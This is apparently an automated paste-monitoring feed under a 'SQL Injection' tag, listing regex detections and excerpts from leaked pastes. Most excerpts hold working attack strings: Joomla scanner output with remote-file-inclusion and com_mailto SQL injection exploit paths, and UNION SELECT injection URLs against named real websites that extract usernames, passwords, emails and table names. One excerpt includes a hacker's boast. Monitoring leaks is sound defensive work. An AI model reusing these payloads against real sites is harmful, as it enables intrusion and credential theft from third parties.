Posts Tagged ‘SQL Injection’
Potential leak of data: Remote File Inclusion
0 votedvote
Detected 1 occurrence(s) of ‘remote file inclusion’:
Crafted URL can disclose absolute path Vulnerable? No # 12 Info -> Core: User redirected Spamming Vulnerability Versions effected: Joomla! 1.5.3 <= Check: /?1.5.3-spam Exploit: User redirect spam Vulnerable? No # 13 Info -> Core: joomla.php Remote File Inclusion Vulnerability Versions effected: 1.0.0 Check: /includes/joomla.php Exploit: /includes/joomla.php?includepath= Vulnerable? No # 14 Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability Versions effected: 1.0.13 <= Check: /admini
Detected 2 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
xploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path= Vulnerable? No # 24 Info -> CoreComponent: MailTo SQL Injection Vulnerability Versions effected: N/A Check: /components/com_mailto/ Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1 Vulnerable? No # 25 Info -> CoreComponent: com_content Blind SQL Injection Vulnerability Versions effected: Joomla! 1.5.0 RC3 Chec
Potential leak of data: SQL Injection
0 votedvote
Detected 3 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
etail.php?id=854 http://gulfphotoplus.com/news-detail.php?id=284 http://www.rav.org/about/newsDetail.php?id=280 http://forum.modrewrite.com/viewtopic.php?f=3&t=5282 http://en.wikipedia.org/wiki/File:Nbra.svg http://www.allanhouser.com/newsDetail.php?id=-21+union+select+1,2,concat(username,0x3a,pass),4,5,6,7,8+from+users+limit+0,1-- http://www.fiberforge.com/news/news-detail.php?id=24 http://www.bealestreetmerchants.com/NewsDetail.php?id=29 http://www.usapavilion2010.com/newsdetail.php?id=37 http://www.maimonides.org
Potential leak of data: CVE Reference
0 votedvote
Detected 1 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:
ttp://thisspartanlife.com/index.php?id=119 http://www.shocktillyoudrop.com/news/topnews.php?id=19224 http://www.erowid.org/experiences/exp.php?ID=53766 http://www.world-dairy-expo.com/file_open.php?id=27 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1968 http://www.wrestleview.com/viewnews.php?id=1281919908 http://www.chicagoelections.com/page.php?id=68 http://www.wdel.com/story.php?id=35422 http://www.joeshowradio.com/archive/old.php?id=20101021-The-Joe-Show-ft-Lyle-Beerbohm http://www.massmoca.org/
Detected 1 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
emberinfo.php?id=34 http://www.kosherconnection.com/memberinfo.php?id=126 http://www.bayareaassn.com/memberinfo.php?id=10 http://www.vlongbiz.com/member/memberinfo.php?id=a9dfe07067ae92df525f0a07f746cc16 http://www.ambervalleybni.co.uk/memberInfo.php?id=-1+union+select+all+1,2,3,concat_ws http://www.buywithconfidence.info/tradeCategory.php?id=98 http://www.davie-coopercity.org/memberinfo.php?id=272 http://www.buywithconfidence.com/tradeCategory.php?id=235 http://chat.postregister.com/transcript.php?id=13 http://use
Potential leak of data: SQL Injection
0 votedvote
Detected 1 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
chk this -= > http://www.acalltomen.com/page.php?id=-51'+union+select+all+1,2,group_concat(table_name),4,5,6+from+information_schema.tables+where+table_schema=0x6163616c6c746f6d656e5f636f6d--+
Potential leak of data: SQL Injection
0 votedvote
Detected 1 occurrence(s) of ‘[a-zA-Z0-9\-_]=.*UNION\+SELECT’:
er,So I inject to,Her... // Single Attacker // Clone Site < // PHP Programming 100 // PM me for help..... http://www.ath-elite.com.au/trainers.php?id=25 http://www.ath-elite.com.au/trainers.php?id=28 http://www.gta-modding.it/area/index.php?act=view&id=34%20...//trainers.php?id=4-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi_user' http://www.fitnessbuildshealth.com/trainers.php?id=101 http://www.nissi-beach.com/article.php?id=18 http://www.backscatter.com/learn/article/article.php?ID=57 http://www.raipurtricks.in/search/l